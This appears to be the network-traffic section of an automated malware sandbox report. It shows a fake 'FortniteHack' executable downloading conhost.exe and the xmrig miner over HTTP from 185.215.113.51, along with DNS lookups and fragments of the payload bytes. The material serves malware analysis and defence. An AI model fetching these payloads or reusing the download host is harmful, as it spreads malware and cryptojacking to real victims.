Mar 13, 2025 13:35:42.710390091 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.710402012 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.710416079 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.710418940 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.710428953 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.710434914 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.710438967 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.710536003 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.710798979 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.710810900 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.710833073 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.710849047 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.710871935 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.710884094 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.710905075 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.710922956 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.710931063 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.710937023 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.710973024 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.710982084 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.710992098 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.711019039 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.711019993 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.711047888 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.711071968 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.711085081 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.711106062 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.711114883 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.711117029 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.711160898 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.711249113 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.711260080 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.711282969 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.711301088 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.711361885 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.711375952 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.711393118 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.711400032 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.711404085 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.711438894 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.711447001 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.711457014 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.711478949 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.711488962 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.711502075 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.711513042 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.711524010 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.711529970 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.711549044 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.711549997 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.711558104 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.711582899 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.711595058 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.711596012 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.711618900 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.711630106 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.711632013 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.711662054 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.711684942 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.711695910 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.711715937 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.711730957 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.711730957 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.711754084 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.711767912 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.711782932 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.711802959 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.711822033 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.711827040 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.711838007 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.711853027 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.711875916 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.711915016 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.711925983 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.711957932 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.711968899 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.711975098 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.711998940 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.712009907 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.712023973 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.712035894 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.712045908 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.712053061 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.712065935 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.712086916 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.712102890 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.712107897 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.712150097 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.712224007 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.712235928 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.712260008 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.712269068 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.712272882 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.712291956 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.712295055 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.712346077 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.748589039 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.748621941 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.748641968 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.748671055 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.748687029 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.748703957 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.748712063 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.748730898 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.748742104 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.748752117 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.748771906 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.748783112 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.748783112 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.748805046 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.748819113 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.748823881 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.748842955 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.748852968 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.748855114 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.748876095 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.748892069 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.759320021 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.759335995 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.759358883 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.759378910 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.759394884 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.759402037 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.759421110 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.759433985 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.759463072 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.759490967 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.759502888 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.759522915 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.759533882 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.759553909 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.759571075 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.759586096 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.759604931 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.759624004 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.759640932 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.759648085 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.759659052 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.759671926 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.759685040 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.759696007 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.759711981 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.759772062 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.759780884 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.759788990 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.759807110 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.759819031 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.759826899 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.759828091 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.759885073 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.798508883 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.798537970 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.798566103 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.798578978 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.798598051 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.798604012 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.798609972 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.798640013 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.798650980 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.798657894 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.798664093 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.798675060 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.798682928 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.798697948 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.798708916 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.798727036 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.798742056 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.798758030 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.798765898 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.798779011 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.798793077 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.798806906 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.798824072 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.798841953 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.798854113 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.798872948 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.798893929 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.798902035 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.798904896 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.798921108 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.798943996 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.798978090 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.799010038 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.799057961 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:42.799084902 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.799099922 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.799117088 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:42.799163103 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:43.019934893 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:43.019994974 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:43.443865061 CET	80	49705	185.215.113.51	192.168.2.12
Mar 13, 2025 13:35:43.443929911 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:43.556916952 CET	49705	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:43.557019949 CET	49706	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:35:57.428606987 CET	60050	53	192.168.2.12	162.159.36.2
Mar 13, 2025 13:35:57.433331966 CET	53	60050	162.159.36.2	192.168.2.12
Mar 13, 2025 13:35:57.433476925 CET	60050	53	192.168.2.12	162.159.36.2
Mar 13, 2025 13:35:57.438220024 CET	53	60050	162.159.36.2	192.168.2.12
Mar 13, 2025 13:35:57.888825893 CET	60050	53	192.168.2.12	162.159.36.2
Mar 13, 2025 13:35:57.893897057 CET	53	60050	162.159.36.2	192.168.2.12
Mar 13, 2025 13:35:57.893965006 CET	60050	53	192.168.2.12	162.159.36.2
Mar 13, 2025 13:36:36.280478954 CET	49703	80	192.168.2.12	185.215.113.51
Mar 13, 2025 13:36:36.285835028 CET	80	49703	185.215.113.51	192.168.2.12
Mar 13, 2025 13:36:36.285892963 CET	49703	80	192.168.2.12	185.215.113.51

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 13, 2025 13:35:12.974435091 CET	57621	53	192.168.2.12	1.1.1.1
Mar 13, 2025 13:35:13.059708118 CET	53	57621	1.1.1.1	192.168.2.12
Mar 13, 2025 13:35:38.829066038 CET	64186	53	192.168.2.12	1.1.1.1
Mar 13, 2025 13:35:38.836083889 CET	53	64186	1.1.1.1	192.168.2.12
Mar 13, 2025 13:35:57.427793980 CET	53	50645	162.159.36.2	192.168.2.12
Mar 13, 2025 13:35:57.906054020 CET	53	50891	1.1.1.1	192.168.2.12

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 13, 2025 13:35:12.974435091 CET	192.168.2.12	1.1.1.1	0x704a	Standard query (0)	citydisco.bet	A (IP address)	IN (0x0001)	false
Mar 13, 2025 13:35:38.829066038 CET	192.168.2.12	1.1.1.1	0x9c3e	Standard query (0)	pastebin.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Mar 13, 2025 13:35:13.059708118 CET	1.1.1.1	192.168.2.12	0x704a	No error (0)	citydisco.bet	188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 13, 2025 13:35:13.059708118 CET	1.1.1.1	192.168.2.12	0x704a	No error (0)	citydisco.bet	188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 13, 2025 13:35:38.836083889 CET	1.1.1.1	192.168.2.12	0x9c3e	No error (0)	pastebin.com	172.67.19.24	A (IP address)	IN (0x0001)	false
Mar 13, 2025 13:35:38.836083889 CET	1.1.1.1	192.168.2.12	0x9c3e	No error (0)	pastebin.com	104.20.4.235	A (IP address)	IN (0x0001)	false
Mar 13, 2025 13:35:38.836083889 CET	1.1.1.1	192.168.2.12	0x9c3e	No error (0)	pastebin.com	104.20.3.235	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

citydisco.bet

pastebin.com

185.215.113.51

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.12	49703	185.215.113.51	80	6908	C:\Users\user\Desktop\FortniteHack.exe1.exe

Timestamp	Bytes transferred	Direction	Data
Mar 13, 2025 13:35:35.462976933 CET	75	OUT	GET /conhost.exe HTTP/1.1 Connection: Keep-Alive Host: 185.215.113.51
Mar 13, 2025 13:35:36.156744957 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 13 Mar 2025 12:35:36 GMT Content-Type: application/octet-stream Content-Length: 21504 Last-Modified: Wed, 15 Jan 2025 19:13:16 GMT Connection: keep-alive ETag: "678808cc-5400" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7a 58 21 9a 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 48 00 00 00 0a 00 00 00 00 00 00 3a 66 00 00 00 20 00 00 00 80 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 00 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e7 65 00 00 4f 00 00 00 00 80 00 00 b8 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 00 00 0c 00 00 00 34 65 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELzX!"0H:f @ `eO4e8 H.text@F H `.rsrcJ@@.relocR@BfH6,cp0}((((((~rpo,0~~rp(~~r#p(+~~rp(~~rCp((((0!(%o `o+0 ( '1s~osr[p+Xo%-8E
Mar 13, 2025 13:35:36.156764030 CET	1236	IN	Data Raw: 05 00 00 00 13 00 00 00 21 00 00 00 2f 00 00 00 3a 00 00 00 45 00 00 00 50 00 00 00 5b 00 00 00 66 00 00 00 71 00 00 00 7c 00 00 00 87 00 00 00 92 00 00 00 9d 00 00 00 a8 00 00 00 38 ae 00 00 00 06 11 08 9a 80 01 00 00 04 38 a0 00 00 00 06 11 08 Data Ascii: !/:EP[fq\|8888+y+n+c+X+M+B+7+,+!+++
Mar 13, 2025 13:35:36.156796932 CET	400	IN	Data Raw: 28 39 00 00 0a 13 10 11 10 6f 3a 00 00 0a 00 00 00 11 0e 17 58 13 0e 11 0e 11 05 8e 69 fe 04 13 11 11 11 2d bf 00 11 0d 17 58 13 0d 11 0d 11 04 8e 69 fe 04 13 12 11 12 2d a4 00 00 72 83 04 00 70 72 99 04 00 70 73 41 00 00 0a 13 13 00 11 13 6f 42 Data Ascii: (9o:Xi-Xi-rprpsAoBoC+CoDt!rpoE(F(G,#0A[(HjoI-,o& Hj,(9o:*P
Mar 13, 2025 13:35:36.156811953 CET	1236	IN	Data Raw: 00 00 00 18 00 4e 66 00 05 17 00 00 01 1b 30 06 00 b0 03 00 00 08 00 00 11 00 72 49 05 00 70 0a 00 7e 4f 00 00 0a 06 17 6f 50 00 00 0a 0b 00 07 6f 51 00 00 0a 0c 1f 18 8d 31 00 00 01 25 16 72 a7 05 00 70 a2 25 17 72 b7 05 00 70 a2 25 18 72 c7 05 Data Ascii: Nf0rIp~OoPoQ1%rp%rp%rp%rp%rp%rp%rp%r%p%rQp%rqp%rp%rp%rp%rp%rp%r3p%rCp%rIp%r[p%rp%rp%
Mar 13, 2025 13:35:36.156830072 CET	1236	IN	Data Raw: 04 25 2d 17 26 7e 20 00 00 04 fe 06 1a 00 00 06 73 5b 00 00 0a 25 80 21 00 00 04 28 02 00 00 2b 28 03 00 00 2b 73 5e 00 00 0a 0c 2b 00 08 2a 00 00 1b 30 04 00 1f 04 00 00 0a 00 00 11 00 7e 12 00 00 04 28 1f 00 00 0a 16 fe 01 0b 07 2c 20 00 7e 12 Data Ascii: %-&~ s[%!(+(+s^+*0~(, ~( &~s7o8~(,"~( &~s7o81%~%(_%rp8\|rp(#s`sa
Mar 13, 2025 13:35:36.156846046 CET	400	IN	Data Raw: 00 17 00 00 01 00 00 00 00 20 03 00 00 f8 00 00 00 18 04 00 00 05 00 00 00 17 00 00 01 13 30 04 00 90 01 00 00 0b 00 00 11 00 16 6a 0a 72 83 0b 00 70 0b 7e 65 00 00 0a 07 16 6f 50 00 00 0a 0c 08 6f 66 00 00 0a 0d 00 09 13 04 16 13 05 38 d8 00 00 Data Ascii: 0jrp~eoPof8rpr)p(.~eoPof81%rp%%r)p%%r)p(+~eoPoQi,"
Mar 13, 2025 13:35:36.156860113 CET	1236	IN	Data Raw: fe 02 16 fe 01 2b 01 16 13 14 11 14 2c 0e 00 72 15 0c 00 70 80 19 00 00 04 00 2b 0c 00 72 1f 0c 00 70 80 19 00 00 04 00 2a 1b 30 01 00 2e 00 00 00 0c 00 00 11 00 20 30 75 00 00 28 36 00 00 0a 00 20 e8 03 00 00 28 36 00 00 0a 00 28 39 00 00 0a 0a Data Ascii: +,rp+rp0. 0u(6 (6(9o:&(0+,{+,{o(i*0}(j"A"Ask(l(msn(o(p
Mar 13, 2025 13:35:36.156871080 CET	224	IN	Data Raw: 00 16 07 79 01 06 00 5f 08 79 01 06 00 69 0b 37 07 0e 00 c8 06 37 07 06 00 da 07 79 01 0e 00 1c 08 43 09 0e 00 67 0c c3 0a 0e 00 0d 0b 43 09 06 00 2d 08 79 01 12 00 ad 08 cb 0b 12 00 bb 07 cb 0b 7f 00 0d 09 00 00 12 00 5f 0b cb 0b 06 00 51 00 9c Data Ascii: y_yi77yCgC-y_Qmyyu77m16MC~v78ly\7yyB?7
Mar 13, 2025 13:35:36.156900883 CET	1236	IN	Data Raw: 02 43 09 06 00 d2 01 31 06 06 00 ff 07 79 01 06 00 5d 0a 79 01 12 00 4a 0b cb 0b 06 00 68 02 37 07 06 00 af 0c 6d 00 16 00 51 02 41 08 06 00 43 00 9c 01 06 00 b3 06 79 01 06 00 3c 02 79 01 06 00 f8 0a 79 01 06 00 02 09 79 01 0a 00 0a 07 96 0a 1a Data Ascii: C1y]yJh7mQACy<yyys.,77wsH7o7fC[A&[]]u!] X
Mar 13, 2025 13:35:36.156919003 CET	1236	IN	Data Raw: 01 e1 00 f0 02 66 00 89 01 c4 0c 86 00 f1 00 36 09 1a 00 f1 00 84 0b 2c 01 f9 00 28 09 31 01 01 01 fd 0b 37 01 f1 01 2e 07 3d 01 c9 01 74 06 42 01 f9 01 ce 03 47 01 c9 01 7d 00 4e 01 01 01 36 0c 53 01 0c 00 36 09 06 00 f1 00 36 09 10 00 b9 00 74 Data Ascii: f6,(17.=tBG}N6S66tf>fn{$6S6:t<6}s6#@!6D)6`1!1O+2
Mar 13, 2025 13:35:36.161653996 CET	1236	IN	Data Raw: 4d 6f 64 75 6c 65 3e 00 44 41 46 00 53 69 7a 65 46 00 53 79 73 74 65 6d 2e 49 4f 00 52 53 00 6d 73 63 6f 72 6c 69 62 00 73 65 74 5f 56 65 72 62 00 3c 3e 63 00 53 79 73 74 65 6d 2e 43 6f 6c 6c 65 63 74 69 6f 6e 73 2e 47 65 6e 65 72 69 63 00 44 6f Data Ascii: Module>DAFSizeFSystem.IORSmscorlibset_Verb<>cSystem.Collections.GenericDownloadFileAsyncOpenReadThreadAddSynchronizedClassItemFieldrndConnectToInterfaceMakeSpacedefaultInstanceset_AutoScaleModeFileModeget_UnicodeEnumerabl

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.12	49705	185.215.113.51	80	7572	C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe

Timestamp	Bytes transferred	Direction	Data
Mar 13, 2025 13:35:41.062757969 CET	73	OUT	GET /xmrig.exe HTTP/1.1 Host: 185.215.113.51 Connection: Keep-Alive
Mar 13, 2025 13:35:41.760101080 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 13 Mar 2025 12:35:41 GMT Content-Type: application/octet-stream Content-Length: 8251392 Last-Modified: Wed, 15 Jan 2025 19:13:17 GMT Connection: keep-alive ETag: "678808cd-7de800" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 db 63 a2 64 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 26 00 10 5f 00 00 d8 7d 00 00 0c 32 00 d0 14 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 30 b0 00 00 10 00 00 4c 7c 7e 00 03 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 